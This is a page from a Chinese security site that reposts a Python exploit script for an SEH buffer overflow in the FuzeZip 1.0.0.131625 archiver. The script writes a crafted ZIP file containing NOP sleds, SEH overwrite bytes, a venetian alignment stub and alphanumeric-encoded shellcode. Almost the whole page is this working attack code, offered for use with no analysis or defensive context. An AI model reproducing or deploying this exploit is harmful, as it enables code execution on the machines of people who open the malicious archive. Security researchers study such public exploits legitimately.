首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FuzeZip 1.0.0.131625 Buffer Overflow
来源:vfocus.net 作者:Rodriguez 发布时间:2013-05-06  
#!/usr/bin/python
# Exploit Title: SEH BUFFER OVERFLOW IN FUZEZIP V.1.0
# Date: 16.Apr.2013 Vulnerability reported
# Exploit Author: Josep Pi Rodriguez, Pedro Guillen Nunez , Miguel Angel de Castro Simon
# Organization: RealPentesting 
# Vendor Homepage: http://fuzezip.com/
# Software Link: http://download.fuzezip.com/FuzeZipSetup.exe
# Version: 1.0.0.131625
# Tested on: Windows 2003 Server Standard SP2

header1 = (
"\x50\x4B\x03\x04\x0A\x00\x00\x00\x00\x00\xE5\x18\xE9\x3E"
"\xCC\xD4\x7C\x56\x0F\x00\x00\x00\x0F\x00\x00\x00\xBF\x17\x00\x00"
)

#0x003F 335C

seh = "\x9a\x9f"
nextsh = "\x58\x70"

header_m = "\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x74\x65\x73\x74\x21\x50\x4B\x01\x02\x14\x00\x0A\x00\x00\x00\x00\x00\xE5\x18\xE9\x3E\xCC\xD4\x7C\x56\x0F\x00\x00\x00\x0F\x00\x00\x00\xBF\x17\x00\x00\x00\x00\x00\x00\x01\x00\x20\x08\x00\x00\x00\x00\x00\x00"
header_f = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00\xED\x17\x00\x00\xEC\x17\x00\x00\x00\x00"

venetian = (
"\x55\x55"
"\x72"
"\x58"
"\x72"
"\x05\x25\x11"
"\x72"
"\x2d\x11\x11"
)

shellcode = (
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1"
"AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLJHDIM0KPM030SYK5P18RQTDK1BNPDK0RLLTKB2MDDKS"
"BO8LO870JMVNQKOP1I0VLOLQQCLLBNLO091HOLMKQ7WZBL0220W4KQBLPTKOROLKQZ0TKOPRX55WPRTPJKQXP0P"
"TKOXLXDKQHO0M1J39SOLQ9DKNT4KM1Z601KONQGPFLGQXOLMM197NXIP2UZTLC3MJXOKCMND2UZBPXTK1HO4KQJ"
"3QVDKLLPKTKB8MLKQJ3TKM4TKKQZ04IOTMTMTQK1KQQQI1JPQKOK0PX1OQJ4KLRJKSVQM1XNSNRM0KPBHD7T3P2"
"QOR4QXPL2WO6KWKOHUVXDPKQKPKPNIGTQDPPS8MYU0RKM0KOZ5PPPP20PPQ0PPOPPPQXYZLO9OK0KOYEU9Y7NQY"
"K0SQXKRM0LQ1L3YJFQZLPQFR7QX7RIK07QWKOJ5PSPWS86WIYNXKOKOXUR3R3R7QXD4JLOKYQKOJ5B73YHGBH45"
"2NPM31KOXUQXC3RMC4M0CYYS1GQGR701ZV2JLRR90VK2KMQVY7OTMTOLKQM1TMOTMTN0I6KPPD1DPPQF261FQ6B"
"60N26R6PSR6RHRYHLOODFKOIE3YYPPNPVOVKONP38KXTGMM1PKOJ5WKJP6UERB6QX6FTUWMUMKOZ5OLM6SLLJ3P"
"KKK045M5WKQ7N3RRRORJM0QCKOHUA"
)

print len(shellcode)

payload = "\x90" * 818 + nextsh + seh + venetian + "\x90" * 109 + "\x72" + shellcode + "\x43" * 4323

buff = payload  
print len(payload)
mefile = open('josep.zip','w')
mefile.write(header1 + buff + header_m + buff + header_f)
mefile.close()






 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ABBS Audio Media Player v3.1 (
·Winarchiver 3.2 Buffer Overflo
·DVD X Player 5.5.37 Pro / Stan
·AudioCoder .M3U Buffer Overflo
·Easy Icon Maker Version 5.01 C
·Huawei SNMPv3 Buffer Overflow
·Vivotek IP Camera Buffer Overf
·Microsoft Internet Explorer CG
·Wordpress W3 Total Cache PHP C
·Dovecot with Exim sender_addre
·phpMyAdmin Authenticated Remot
·MoinMelt Arbitrary Command Exe
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved